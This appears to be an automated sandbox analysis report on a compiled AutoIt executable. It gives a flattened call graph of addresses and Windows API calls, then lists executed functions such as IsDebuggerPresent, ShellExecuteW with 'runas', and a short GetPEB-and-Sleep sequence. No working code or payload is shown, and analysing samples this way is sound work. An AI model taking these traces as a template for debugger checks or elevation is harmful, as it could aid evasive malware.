102821->102890 102824 e7d21 102825 e7d2c 102824->102825 102926 e30b5 58 API calls 3 library calls 102824->102926 102904 e30ef 102825->102904 102828 e7d34 102829 e7d3f __wwincmdln 102828->102829 102927 e30b5 58 API calls 3 library calls 102828->102927 102910 c47d0 102829->102910 102832 e7d53 102833 e7d62 102832->102833 102928 e3358 58 API calls _doexit 102832->102928 102929 e30e0 58 API calls _doexit 102833->102929 102836 e7d67 _raise 102838 e9e1e 102837->102838 102838->102803 102839->102805 102930 e3187 36 API calls 2 library calls 102840->102930 102842 e9aeb 102931 e9d3c InitializeCriticalSectionAndSpinCount __ioinit 102842->102931 102844 e9af0 102845 e9af4 102844->102845 102933 e9d8a TlsAlloc 102844->102933 102932 e9b5c 61 API calls 2 library calls 102845->102932 102848 e9b06 102848->102845 102850 e9b11 102848->102850 102849 e9af9 102849->102809 102934 e87d5 102850->102934 102853 e9b53 102942 e9b5c 61 API calls 2 library calls 102853->102942 102856 e9b32 102856->102853 102858 e9b38 102856->102858 102857 e9b58 102857->102809 102941 e9a33 58 API calls 4 library calls 102858->102941 102860 e9b40 GetCurrentThreadId 102860->102809 102862 ed5de _raise 102861->102862 102863 e9c0b __lock 58 API calls 102862->102863 102864 ed5e5 102863->102864 102865 e87d5 __calloc_crt 58 API calls 102864->102865 102866 ed5f6 102865->102866 102867 ed661 GetStartupInfoW 102866->102867 102868 ed601 _raise @_EH4_CallFilterFunc@8 102866->102868 102874 ed676 102867->102874 102877 ed7a5 102867->102877 102868->102813 102869 ed86d 102956 ed87d LeaveCriticalSection _doexit 102869->102956 102871 e87d5 __calloc_crt 58 API calls 102871->102874 102872 ed7f2 GetStdHandle 102872->102877 102873 ed805 GetFileType 102873->102877 102874->102871 102876 ed6c4 102874->102876 102874->102877 102875 ed6f8 GetFileType 102875->102876 102876->102875 102876->102877 102954 e9e2b InitializeCriticalSectionAndSpinCount 102876->102954 102877->102869 102877->102872 102877->102873 102955 e9e2b InitializeCriticalSectionAndSpinCount 102877->102955 102881 e7d06 102880->102881 102882 f4f34 102880->102882 102886 f4b1b GetModuleFileNameW 102881->102886 102957 e881d 58 API calls 2 library calls 102882->102957 102884 f4f5a _memmove 102885 f4f70 FreeEnvironmentStringsW 102884->102885 102885->102881 102887 f4b4f _wparse_cmdline 102886->102887 102889 f4b8f _wparse_cmdline 102887->102889 102958 e881d 58 API calls 2 library calls 102887->102958 102889->102820 102891 f4d71 __NMSG_WRITE 102890->102891 102895 f4d69 102890->102895 102892 e87d5 __calloc_crt 58 API calls 102891->102892 102900 f4d9a __NMSG_WRITE 102892->102900 102893 f4df1 102894 e2d55 _free 58 API calls 102893->102894 102894->102895 102895->102824 102896 e87d5 __calloc_crt 58 API calls 102896->102900 102897 f4e16 102898 e2d55 _free 58 API calls 102897->102898 102898->102895 102900->102893 102900->102895 102900->102896 102900->102897 102901 f4e2d 102900->102901 102959 f4607 58 API calls __wsplitpath_helper 102900->102959 102960 e8dc6 IsProcessorFeaturePresent 102901->102960 102903 f4e39 102903->102824 102906 e30fb __IsNonwritableInCurrentImage 102904->102906 102975 ea4d1 102906->102975 102907 e3119 __initterm_e 102908 e2d40 __cinit 67 API calls 102907->102908 102909 e3138 _doexit __IsNonwritableInCurrentImage 102907->102909 102908->102909 102909->102828 102911 c47ea 102910->102911 102921 c4889 102910->102921 102912 c4824 IsThemeActive 102911->102912 102978 e336c 102912->102978 102916 c4850 102990 c48fd SystemParametersInfoW SystemParametersInfoW 102916->102990 102918 c485c 102991 c3b3a 102918->102991 102920 c4864 SystemParametersInfoW 102920->102921 102921->102832 102922->102808 102923->102810 102924->102817 102928->102833 102929->102836 102930->102842 102931->102844 102932->102849 102933->102848 102935 e87dc 102934->102935 102937 e8817 102935->102937 102939 e87fa 102935->102939 102943 f51f6 102935->102943 102937->102853 102940 e9de6 TlsSetValue 102937->102940 102939->102935 102939->102937 102951 ea132 Sleep 102939->102951 102940->102856 102941->102860 102942->102857 102944 f5201 102943->102944 102946 f521c 102943->102946 102945 f520d 102944->102945 102944->102946 102952 e8b28 58 API calls __getptd_noexit 102945->102952 102947 f522c HeapAlloc 102946->102947 102949 f5212 102946->102949 102953 e33a1 DecodePointer 102946->102953 102947->102946 102947->102949 102949->102935 102951->102939 102952->102949 102953->102946 102954->102876 102955->102877 102956->102868 102957->102884 102958->102889 102959->102900 102961 e8dd1 102960->102961 102966 e8c59 102961->102966 102965 e8dec 102965->102903 102967 e8c73 _memset __call_reportfault 102966->102967 102968 e8c93 IsDebuggerPresent 102967->102968 102974 ea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 102968->102974 102970 ec5f6 __cftog_l 6 API calls 102972 e8d7a 102970->102972 102971 e8d57 __call_reportfault 102971->102970 102973 ea140 GetCurrentProcess TerminateProcess 102972->102973 102973->102965 102974->102971 102976 ea4d4 EncodePointer 102975->102976 102976->102976 102977 ea4ee 102976->102977 102977->102907 102979 e9c0b __lock 58 API calls 102978->102979 102980 e3377 DecodePointer EncodePointer 102979->102980 103043 e9d75 LeaveCriticalSection 102980->103043 102982 c4849 102983 e33d4 102982->102983 102984 e33de 102983->102984 102985 e33f8 102983->102985 102984->102985 103044 e8b28 58 API calls __getptd_noexit 102984->103044 102985->102916 102987 e33e8 103045 e8db6 9 API calls __wsplitpath_helper 102987->103045 102989 e33f3 102989->102916 102990->102918 102992 c3b47 __write_nolock 102991->102992 102993 c7667 59 API calls 102992->102993 102994 c3b51 GetCurrentDirectoryW 102993->102994 103046 c3766 102994->103046 102996 c3b7a IsDebuggerPresent 102997 c3b88 102996->102997 102998 fd272 MessageBoxA 102996->102998 103000 fd28c 102997->103000 103001 c3ba5 102997->103001 103030 c3c61 102997->103030 102998->103000 102999 c3c68 SetCurrentDirectoryW 103004 c3c75 Mailbox 102999->103004 103179 c7213 59 API calls Mailbox 103000->103179 103127 c7285 103001->103127 103004->102920 103005 fd29c 103010 fd2b2 SetCurrentDirectoryW 103005->103010 103007 c3bc3 GetFullPathNameW 103008 c7bcc 59 API calls 103007->103008 103009 c3bfe 103008->103009 103143 d092d 103009->103143 103010->103004 103013 c3c1c 103014 c3c26 103013->103014 103180 11874b AllocateAndInitializeSid CheckTokenMembership FreeSid 103013->103180 103159 c3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 103014->103159 103017 fd2cf 103017->103014 103020 fd2e0 103017->103020 103022 c4706 61 API calls 103020->103022 103024 fd2e8 103022->103024 103027 c7de1 59 API calls 103024->103027 103030->102999 103043->102982 103044->102987 103045->102989 103047 c7667 59 API calls 103046->103047 103048 c377c 103047->103048 103181 c3d31 103048->103181 103050 c379a 103051 c4706 61 API calls 103050->103051 103052 c37ae 103051->103052 103053 c7de1 59 API calls 103052->103053 103054 c37bb 103053->103054 103055 c4ddd 136 API calls 103054->103055 103056 c37d4 103055->103056 103057 c37dc Mailbox 103056->103057 103058 fd173 103056->103058 103061 c8047 59 API calls 103057->103061 103223 12955b 103058->103223 103063 c37ef 103061->103063 103062 e2d55 _free 58 API calls 103065 fd19f 103062->103065 103195 c928a 103063->103195 103064 c4e4a 84 API calls 103067 fd192 103064->103067 103068 c4e4a 84 API calls 103065->103068 103067->103062 103070 fd1a8 103068->103070 103074 c3ed0 59 API calls 103070->103074 103071 c7de1 59 API calls 103072 c3808 103071->103072 103073 c84c0 69 API calls 103072->103073 103075 c381a Mailbox 103073->103075 103076 fd1c3 103074->103076 103077 c7de1 59 API calls 103075->103077 103078 c3ed0 59 API calls 103076->103078 103079 c3840 103077->103079 103080 fd1df 103078->103080 103081 c84c0 69 API calls 103079->103081 103082 c4706 61 API calls 103080->103082 103084 c384f Mailbox 103081->103084 103083 fd204 103082->103083 103085 c3ed0 59 API calls 103083->103085 103087 c7667 59 API calls 103084->103087 103086 fd210 103085->103086 103088 c8047 59 API calls 103086->103088 103089 c386d 103087->103089 103090 fd21e 103088->103090 103198 c3ed0 103089->103198 103092 c3ed0 59 API calls 103090->103092 103094 fd22d 103092->103094 103100 c8047 59 API calls 103094->103100 103096 c3887 103096->103070 103097 c3891 103096->103097 103098 e2efd _W_store_winword 60 API calls 103097->103098 103099 c389c 103098->103099 103099->103076 103101 c38a6 103099->103101 103102 fd24f 103100->103102 103103 e2efd _W_store_winword 60 API calls 103101->103103 103104 c3ed0 59 API calls 103102->103104 103105 c38b1 103103->103105 103106 fd25c 103104->103106 103105->103080 103107 c38bb 103105->103107 103106->103106 103108 e2efd _W_store_winword 60 API calls 103107->103108 103109 c38c6 103108->103109 103109->103094 103110 c3907 103109->103110 103112 c3ed0 59 API calls 103109->103112 103110->103094 103111 c3914 103110->103111 103114 c92ce 59 API calls 103111->103114 103113 c38ea 103112->103113 103115 c8047 59 API calls 103113->103115 103116 c3924 103114->103116 103117 c38f8 103115->103117 103118 c9050 59 API calls 103116->103118 103119 c3ed0 59 API calls 103117->103119 103120 c3932 103118->103120 103119->103110 103214 c8ee0 103120->103214 103122 c928a 59 API calls 103124 c394f 103122->103124 103123 c8ee0 60 API calls 103123->103124 103124->103122 103124->103123 103125 c3ed0 59 API calls 103124->103125 103126 c3995 Mailbox 103124->103126 103125->103124 103126->102996 103128 c7292 __write_nolock 103127->103128 103129 c72ab 103128->103129 103130 fea22 _memset 103128->103130 103131 c4750 60 API calls 103129->103131 103132 fea3e GetOpenFileNameW 103130->103132 103133 c72b4 103131->103133 103134 fea8d 103132->103134 103263 e0791 103133->103263 103136 c7bcc 59 API calls 103134->103136 103138 feaa2 103136->103138 103138->103138 103140 c72c9 103281 c686a 103140->103281 103144 d093a __write_nolock 103143->103144 103459 c6d80 103144->103459 103146 d093f 103147 c3c14 103146->103147 103470 d119e 89 API calls 103146->103470 103147->103005 103147->103013 103149 d094c 103149->103147 103471 d3ee7 91 API calls Mailbox 103149->103471 103151 d0955 103151->103147 103152 d0959 GetFullPathNameW 103151->103152 103153 c7bcc 59 API calls 103152->103153 103154 d0985 103153->103154 103155 c7bcc 59 API calls 103154->103155 103160 c3ab0 LoadImageW RegisterClassExW 103159->103160 103161 fd261 103159->103161 103473 c3041 7 API calls 103160->103473 103474 c47a0 LoadImageW EnumResourceNamesW 103161->103474 103164 c3b34 103166 c39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103164->103166 103165 fd26a 103179->103005 103180->103017 103182 c3d3e __write_nolock 103181->103182 103183 c7bcc 59 API calls 103182->103183 103189 c3ea4 Mailbox 103182->103189 103185 c3d70 103183->103185 103184 c79f2 59 API calls 103184->103185 103185->103184 103194 c3da6 Mailbox 103185->103194 103186 c79f2 59 API calls 103186->103194 103187 c3e77 103188 c7de1 59 API calls 103187->103188 103187->103189 103191 c3e98 103188->103191 103189->103050 103190 c7de1 59 API calls 103190->103194 103192 c3f74 59 API calls 103191->103192 103192->103189 103193 c3f74 59 API calls 103193->103194 103194->103186 103194->103187 103194->103189 103194->103190 103194->103193 103196 e0db6 Mailbox 59 API calls 103195->103196 103197 c37fb 103196->103197 103197->103071 103199 c3eda 103198->103199 103200 c3ef3 103198->103200 103202 c8047 59 API calls 103199->103202 103201 c7bcc 59 API calls 103200->103201 103203 c3879 103201->103203 103202->103203 103204 e2efd 103203->103204 103205 e2f7e 103204->103205 103206 e2f09 103204->103206 103260 e2f90 60 API calls 3 library calls 103205->103260 103210 e2f2e 103206->103210 103258 e8b28 58 API calls __getptd_noexit 103206->103258 103209 e2f8b 103209->103096 103210->103096 103211 e2f15 103259 e8db6 9 API calls __wsplitpath_helper 103211->103259 103213 e2f20 103213->103096 103215 ff17c 103214->103215 103217 c8ef7 103214->103217 103215->103217 103261 c8bdb 59 API calls Mailbox 103215->103261 103218 c8fff 103217->103218 103219 c8ff8 103217->103219 103220 c9040 103217->103220 103218->103124 103222 e0db6 Mailbox 59 API calls 103219->103222 103221 c9d3c 60 API calls 103220->103221 103221->103218 103222->103218 103224 c4ee5 85 API calls 103223->103224 103225 1295ca 103224->103225 103226 129734 96 API calls 103225->103226 103227 1295dc 103226->103227 103228 c4f0b 74 API calls 103227->103228 103256 fd186 103227->103256 103229 1295f7 103228->103229 103230 c4f0b 74 API calls 103229->103230 103231 129607 103230->103231 103232 c4f0b 74 API calls 103231->103232 103233 129622 103232->103233 103234 c4f0b 74 API calls 103233->103234 103235 12963d 103234->103235 103236 c4ee5 85 API calls 103235->103236 103237 129654 103236->103237 103238 e571c __crtGetStringTypeA_stat 58 API calls 103237->103238 103239 12965b 103238->103239 103240 e571c __crtGetStringTypeA_stat 58 API calls 103239->103240 103241 129665 103240->103241 103242 c4f0b 74 API calls 103241->103242 103243 129679 103242->103243 103244 129109 GetSystemTimeAsFileTime 103243->103244 103245 12968c 103244->103245 103246 1296a1 103245->103246 103247 1296b6 103245->103247 103250 e2d55 _free 58 API calls 103246->103250 103248 12971b 103247->103248 103249 1296bc 103247->103249 103253 e2d55 _free 58 API calls 103248->103253 103262 128b06 116 API calls __fcloseall 103249->103262 103251 1296a7 103250->103251 103254 e2d55 _free 58 API calls 103251->103254 103253->103256 103254->103256 103255 129713 103257 e2d55 _free 58 API calls 103255->103257 103256->103064 103256->103067 103257->103256 103258->103211 103259->103213 103260->103209 103261->103217 103262->103255 103264 e079e __write_nolock 103263->103264 103265 e079f GetLongPathNameW 103264->103265 103266 c7bcc 59 API calls 103265->103266 103267 c72bd 103266->103267 103268 c700b 103267->103268 103269 c7667 59 API calls 103268->103269 103270 c701d 103269->103270 103271 c4750 60 API calls 103270->103271 103272 c7028 103271->103272 103273 fe885 103272->103273 103274 c7033 103272->103274 103279 fe89f 103273->103279 103321 c7908 61 API calls 103273->103321 103275 c3f74 59 API calls 103274->103275 103277 c703f 103275->103277 103315 c34c2 103277->103315 103280 c7052 Mailbox 103280->103140 103282 c4ddd 136 API calls 103281->103282 103283 c688f 103282->103283 103284 fe031 103283->103284 103286 c4ddd 136 API calls 103283->103286 103285 12955b 122 API calls 103284->103285 103287 fe046 103285->103287 103288 c68a3 103286->103288 103289 fe04a 103287->103289 103290 fe067 103287->103290 103288->103284 103291 c68ab 103288->103291 103292 c4e4a 84 API calls 103289->103292 103293 e0db6 Mailbox 59 API calls 103290->103293 103294 c68b7 103291->103294 103295 fe052 103291->103295 103292->103295 103314 fe0ac Mailbox 103293->103314 103322 c6a8c 103294->103322 103421 1242f8 90 API calls _wprintf 103295->103421 103298 fe060 103298->103290 103300 fe260 103301 e2d55 _free 58 API calls 103300->103301 103302 fe268 103301->103302 103303 c4e4a 84 API calls 103302->103303 103304 fe271 103303->103304 103308 e2d55 _free 58 API calls 103304->103308 103310 c4e4a 84 API calls 103304->103310 103425 11f7a1 89 API calls 4 library calls 103304->103425 103305 c750f 59 API calls 103305->103314 103308->103304 103310->103304 103311 c7de1 59 API calls 103311->103314 103314->103300 103314->103304 103314->103305 103314->103311 103415 c735d 103314->103415 103422 11f73d 59 API calls 2 library calls 103314->103422 103423 11f65e 61 API calls 2 library calls 103314->103423 103424 12737f 59 API calls Mailbox 103314->103424 103316 c34d4 103315->103316 103320 c34f3 _memmove 103315->103320 103318 e0db6 Mailbox 59 API calls 103316->103318 103317 e0db6 Mailbox 59 API calls 103319 c350a 103317->103319 103318->103320 103319->103280 103320->103317 103321->103273 103323 fe41e 103322->103323 103324 c6ab5 103322->103324 103447 11f7a1 89 API calls 4 library calls 103323->103447 103431 c57a6 60 API calls Mailbox 103324->103431 103327 c6ad7 103432 c57f6 67 API calls 103327->103432 103328 fe431 103448 11f7a1 89 API calls 4 library calls 103328->103448 103330 c6aec 103330->103328 103332 c6af4 103330->103332 103334 c7667 59 API calls 103332->103334 103333 fe44d 103336 c6b61 103333->103336 103335 c6b00 103334->103335 103433 e0957 60 API calls __write_nolock 103335->103433 103338 c6b6f 103336->103338 103339 fe460 103336->103339 103343 c7667 59 API calls 103338->103343 103342 c5c6f CloseHandle 103339->103342 103340 c6b0c 103341 c7667 59 API calls 103340->103341 103344 c6b18 103341->103344 103345 fe46c 103342->103345 103346 c6b78 103343->103346 103347 c4750 60 API calls 103344->103347 103348 c4ddd 136 API calls 103345->103348 103349 c7667 59 API calls 103346->103349 103350 c6b26 103347->103350 103351 fe488 103348->103351 103352 c6b81 103349->103352 103434 c5850 ReadFile SetFilePointerEx 103350->103434 103354 fe4b1 103351->103354 103358 12955b 122 API calls 103351->103358 103355 c459b 59 API calls 103352->103355 103449 11f7a1 89 API calls 4 library calls 103354->103449 103359 c6b98 103355->103359 103357 c6b52 103435 c5aee SetFilePointerEx SetFilePointerEx 103357->103435 103362 fe4a4 103358->103362 103363 c7b2e 59 API calls 103359->103363 103360 fe4c8 103394 c6d0c Mailbox 103360->103394 103365 fe4cd 103362->103365 103366 fe4ac 103362->103366 103364 c6ba9 SetCurrentDirectoryW 103363->103364 103371 c6bbc Mailbox 103364->103371 103367 c4e4a 84 API calls 103365->103367 103368 c4e4a 84 API calls 103366->103368 103369 fe4d2 103367->103369 103368->103354 103370 e0db6 Mailbox 59 API calls 103369->103370 103377 fe506 103370->103377 103373 e0db6 Mailbox 59 API calls 103371->103373 103375 c6bcf 103373->103375 103374 c3bbb 103374->103007 103374->103030 103376 c522e 59 API calls 103375->103376 103391 c6bda Mailbox __NMSG_WRITE 103376->103391 103378 c750f 59 API calls 103377->103378 103384 fe54f Mailbox 103378->103384 103379 c6ce7 103443 c5c6f 103379->103443 103382 fe740 103454 1272df 59 API calls Mailbox 103382->103454 103383 c6cf3 SetCurrentDirectoryW 103383->103394 103384->103382 103396 c750f 59 API calls 103384->103396 103406 c7de1 59 API calls 103384->103406 103410 fe792 103384->103410 103450 11f73d 59 API calls 2 library calls 103384->103450 103451 11f65e 61 API calls 2 library calls 103384->103451 103452 12737f 59 API calls Mailbox 103384->103452 103453 c7213 59 API calls Mailbox 103384->103453 103387 fe762 103455 13fbce 59 API calls 2 library calls 103387->103455 103390 fe76f 103392 e2d55 _free 58 API calls 103390->103392 103391->103379 103399 fe7d1 103391->103399 103402 c7de1 59 API calls 103391->103402 103403 fe7d9 103391->103403 103436 c586d 67 API calls _wcscpy 103391->103436 103437 c6f5d GetStringTypeW 103391->103437 103438 c6ecc 60 API calls __wcsnicmp 103391->103438 103439 c6faa GetStringTypeW __NMSG_WRITE 103391->103439 103440 e363d GetStringTypeW _iswctype 103391->103440 103441 c68dc 165 API calls 3 library calls 103391->103441 103442 c7213 59 API calls Mailbox 103391->103442 103392->103394 103426 c57d4 103394->103426 103396->103384 103397 fe7f2 103397->103379 103457 11f5f7 59 API calls 4 library calls 103399->103457 103402->103391 103458 11f7a1 89 API calls 4 library calls 103403->103458 103406->103384 103456 11f7a1 89 API calls 4 library calls 103410->103456 103412 fe7ab 103413 e2d55 _free 58 API calls 103412->103413 103414 fe7be 103413->103414 103414->103394 103416 c7370 103415->103416 103419 c741e 103415->103419 103417 e0db6 Mailbox 59 API calls 103416->103417 103420 c73a2 103416->103420 103417->103420 103418 e0db6 59 API calls Mailbox 103418->103420 103419->103314 103420->103418 103420->103419 103421->103298 103422->103314 103423->103314 103424->103314 103425->103304 103427 c5c6f CloseHandle 103426->103427 103428 c57dc Mailbox 103427->103428 103429 c5c6f CloseHandle 103428->103429 103430 c57eb 103429->103430 103430->103374 103431->103327 103432->103330 103433->103340 103434->103357 103435->103336 103436->103391 103437->103391 103438->103391 103439->103391 103440->103391 103441->103391 103442->103391 103444 c5c88 103443->103444 103445 c5c79 103443->103445 103444->103445 103446 c5c8d CloseHandle 103444->103446 103445->103383 103446->103445 103447->103328 103448->103333 103449->103360 103450->103384 103451->103384 103452->103384 103453->103384 103454->103387 103455->103390 103456->103412 103457->103403 103458->103397 103460 c6d95 103459->103460 103464 c6ea9 103459->103464 103461 e0db6 Mailbox 59 API calls 103460->103461 103460->103464 103463 c6dbc 103461->103463 103462 e0db6 Mailbox 59 API calls 103465 c6e31 103462->103465 103463->103462 103464->103146 103465->103464 103466 c6240 94 API calls 103465->103466 103468 c735d 59 API calls 103465->103468 103469 c750f 59 API calls 103465->103469 103472 116553 59 API calls Mailbox 103465->103472 103466->103465 103468->103465 103469->103465 103470->103149 103471->103151 103472->103465 103473->103164 103474->103165 103502 c1055 103507 c2649 103502->103507 103505 e2d40 __cinit 67 API calls 103506 c1064 103505->103506 103508 c7667 59 API calls 103507->103508 103509 c26b7 103508->103509 103514 c3582 103509->103514 103511 c2754 103513 c105a 103511->103513 103517 c3416 59 API calls 2 library calls 103511->103517 103513->103505 103518 c35b0 103514->103518 103517->103511 103519 c35bd 103518->103519 103520 c35a1 103518->103520 103519->103520 103521 c35c4 RegOpenKeyExW 103519->103521 103520->103511 103521->103520 103522 c35de RegQueryValueExW 103521->103522 103523 c35ff 103522->103523 103524 c3614 RegCloseKey 103522->103524 103523->103524 103524->103520 103525 c1016 103530 c4974 103525->103530 103528 e2d40 __cinit 67 API calls 103529 c1025 103528->103529 103531 e0db6 Mailbox 59 API calls 103530->103531 103532 c497c 103531->103532 103533 c101b 103532->103533 103537 c4936 103532->103537 103533->103528 103538 c493f 103537->103538 103540 c4951 103537->103540 103539 e2d40 __cinit 67 API calls 103538->103539 103539->103540 103541 c49a0 103540->103541 103542 c7667 59 API calls 103541->103542 103543 c49b8 GetVersionExW 103542->103543 103544 c7bcc 59 API calls 103543->103544 103545 c49fb 103544->103545 103546 c7d2c 59 API calls 103545->103546 103557 c4a28 103545->103557 103547 c4a1c 103546->103547 103548 c7726 59 API calls 103547->103548 103548->103557 103549 c4a93 GetCurrentProcess IsWow64Process 103550 c4aac 103549->103550 103552 c4b2b GetSystemInfo 103550->103552 103553 c4ac2 103550->103553 103551 fd864 103554 c4af8 103552->103554 103565 c4b37 103553->103565 103554->103533 103557->103549 103557->103551 103558 c4b1f GetSystemInfo 103561 c4ae9 103558->103561 103559 c4ad4 103560 c4b37 2 API calls 103559->103560 103562 c4adc GetNativeSystemInfo 103560->103562 103561->103554 103563 c4aef FreeLibrary 103561->103563 103562->103561 103563->103554 103566 c4ad0 103565->103566 103567 c4b40 LoadLibraryA 103565->103567 103566->103558 103566->103559 103567->103566 103568 c4b51 GetProcAddress 103567->103568 103568->103566 103569 c1066 103574 cf76f 103569->103574 103571 c106c 103572 e2d40 __cinit 67 API calls 103571->103572 103573 c1076 103572->103573 103575 cf790 103574->103575 103607 dff03 103575->103607 103579 cf7d7 103580 c7667 59 API calls 103579->103580 103581 cf7e1 103580->103581 103582 c7667 59 API calls 103581->103582 103583 cf7eb 103582->103583 103584 c7667 59 API calls 103583->103584 103585 cf7f5 103584->103585 103586 c7667 59 API calls 103585->103586 103587 cf833 103586->103587 103588 c7667 59 API calls 103587->103588 103589 cf8fe 103588->103589 103617 d5f87 103589->103617 103593 cf930 103594 c7667 59 API calls 103593->103594 103595 cf93a 103594->103595 103645 dfd9e 103595->103645 103597 cf981 103598 cf991 GetStdHandle 103597->103598 103599 cf9dd 103598->103599 103600 1045ab 103598->103600 103601 cf9e5 OleInitialize 103599->103601 103600->103599 103602 1045b4 103600->103602 103601->103571 103652 126b38 64 API calls Mailbox 103602->103652 103604 1045bb 103653 127207 CreateThread 103604->103653 103606 1045c7 CloseHandle 103606->103601 103654 dffdc 103607->103654 103610 dffdc 59 API calls 103611 dff45 103610->103611 103612 c7667 59 API calls 103611->103612 103613 dff51 103612->103613 103614 c7bcc 59 API calls 103613->103614 103615 cf796 103614->103615 103616 e0162 6 API calls 103615->103616 103616->103579 103618 c7667 59 API calls 103617->103618 103619 d5f97 103618->103619 103620 c7667 59 API calls 103619->103620 103621 d5f9f 103620->103621 103661 d5a9d 103621->103661 103624 d5a9d 59 API calls 103625 d5faf 103624->103625 103626 c7667 59 API calls 103625->103626 103627 d5fba 103626->103627 103628 e0db6 Mailbox 59 API calls 103627->103628 103629 cf908 103628->103629 103630 d60f9 103629->103630 103631 d6107 103630->103631 103632 c7667 59 API calls 103631->103632 103633 d6112 103632->103633 103634 c7667 59 API calls 103633->103634 103635 d611d 103634->103635 103636 c7667 59 API calls 103635->103636 103637 d6128 103636->103637 103638 c7667 59 API calls 103637->103638 103639 d6133 103638->103639 103640 d5a9d 59 API calls 103639->103640 103641 d613e 103640->103641 103642 e0db6 Mailbox 59 API calls 103641->103642 103643 d6145 RegisterWindowMessageW 103642->103643 103643->103593 103646 dfdae 103645->103646 103647 11576f 103645->103647 103649 e0db6 Mailbox 59 API calls 103646->103649 103664 129ae7 60 API calls 103647->103664 103651 dfdb6 103649->103651 103650 11577a 103651->103597 103652->103604 103653->103606 103665 1271ed 65 API calls 103653->103665 103655 c7667 59 API calls 103654->103655 103656 dffe7 103655->103656 103657 c7667 59 API calls 103656->103657 103658 dffef 103657->103658 103659 c7667 59 API calls 103658->103659 103660 dff3b 103659->103660 103660->103610 103662 c7667 59 API calls 103661->103662 103663 d5aa5 103662->103663 103663->103624 103664->103650 103666 14cedc0 103680 14cca10 103666->103680 103668 14cee81 103683 14cecb0 103668->103683 103686 14cfeb0 GetPEB 103680->103686 103682 14cd09b 103682->103668 103684 14cecb9 Sleep 103683->103684 103685 14cecc7 103684->103685 103687 14cfeda 103686->103687 103687->103682 103688 c3633 103689 c366a 103688->103689 103690 c3688 103689->103690 103691 c36e7 103689->103691 103728 c36e5 103689->103728 103692 c374b PostQuitMessage 103690->103692 103693 c3695 103690->103693 103695 c36ed 103691->103695 103696 fd0cc 103691->103696 103700 c36d8 103692->103700 103698 fd154 103693->103698 103699 c36a0 103693->103699 103694 c36ca DefWindowProcW 103694->103700 103701 c3715 SetTimer RegisterWindowMessageW 103695->103701 103702 c36f2 103695->103702 103743 d1070 10 API calls Mailbox 103696->103743 103748 122527 71 API calls _memset 103698->103748 103704 c36a8 103699->103704 103705 c3755 103699->103705 103701->103700 103706 c373e CreatePopupMenu 103701->103706 103708 fd06f 103702->103708 103709 c36f9 KillTimer 103702->103709 103703 fd0f3 103744 d1093 341 API calls Mailbox 103703->103744 103712 fd139 103704->103712 103713 c36b3 103704->103713 103733 c44a0 103705->103733 103706->103700 103716 fd0a8 MoveWindow 103708->103716 103717 fd074 103708->103717 103740 c443a Shell_NotifyIconW _memset 103709->103740 103712->103694 103747 117c36 59 API calls Mailbox 103712->103747 103719 c36be 103713->103719 103720 fd124 103713->103720 103714 fd166 103714->103694 103714->103700 103716->103700 103721 fd078 103717->103721 103722 fd097 SetFocus 103717->103722 103718 c370c 103741 c3114 DeleteObject DestroyWindow Mailbox 103718->103741 103719->103694 103745 c443a Shell_NotifyIconW _memset 103719->103745 103746 122d36 81 API calls _memset 103720->103746 103721->103719 103725 fd081 103721->103725 103722->103700 103742 d1070 10 API calls Mailbox 103725->103742 103727 fd134 103727->103700 103728->103694 103731 fd118 103732 c434a 68 API calls 103731->103732 103732->103728 103734 c4539 103733->103734 103735 c44b7 _memset 103733->103735 103734->103700 103736 c407c 61 API calls 103735->103736 103738 c44de 103736->103738 103737 c4522 KillTimer SetTimer 103737->103734 103738->103737 103739 fd4ab Shell_NotifyIconW 103738->103739 103739->103737 103740->103718 103741->103700 103742->103700 103743->103703 103744->103719 103745->103731 103746->103727 103747->103728 103748->103714 103749 128d0d 103750 128d20 103749->103750 103751 128d1a 103749->103751 103753 128d31 103750->103753 103755 e2d55 _free 58 API calls 103750->103755 103752 e2d55 _free 58 API calls 103751->103752 103752->103750 103754 128d43 103753->103754 103756 e2d55 _free 58 API calls 103753->103756 103755->103753 103756->103754 103757 10416f 103761 115fe6 103757->103761 103759 10417a 103760 115fe6 85 API calls 103759->103760 103760->103759 103762 116020 103761->103762 103766 115ff3 103761->103766 103762->103759 103763 116022 103773 c9328 84 API calls Mailbox 103763->103773 103764 116027 103767 c9837 84 API calls 103764->103767 103766->103762 103766->103763 103766->103764 103770 11601a 103766->103770 103768 11602e 103767->103768 103769 c7b2e 59 API calls 103768->103769 103769->103762 103772 c95a0 59 API calls _wcsstr 103770->103772 103772->103762 103773->103764

                                                        Executed Functions

                                                        Function 000C3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C3B68
                                                        • IsDebuggerPresent.KERNEL32 ref: 000C3B7A
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,001852F8,001852E0,?,?), ref: 000C3BEB
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                          • Part of subcall function 000D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000C3C14,001852F8,?,?,?), ref: 000D096E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000C3C6F
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00177770,00000010), ref: 000FD281
                                                        • SetCurrentDirectoryW.KERNEL32(?,001852F8,?,?,?), ref: 000FD2B9
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00174260,001852F8,?,?,?), ref: 000FD33F
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 000FD346
                                                          • Part of subcall function 000C3A46: GetSysColorBrush.USER32(0000000F), ref: 000C3A50
                                                          • Part of subcall function 000C3A46: LoadCursorW.USER32(00000000,00007F00), ref: 000C3A5F
                                                          • Part of subcall function 000C3A46: LoadIconW.USER32(00000063), ref: 000C3A76
                                                          • Part of subcall function 000C3A46: LoadIconW.USER32(000000A4), ref: 000C3A88
                                                          • Part of subcall function 000C3A46: LoadIconW.USER32(000000A2), ref: 000C3A9A
                                                          • Part of subcall function 000C3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C3AC0
                                                          • Part of subcall function 000C3A46: RegisterClassExW.USER32(?), ref: 000C3B16
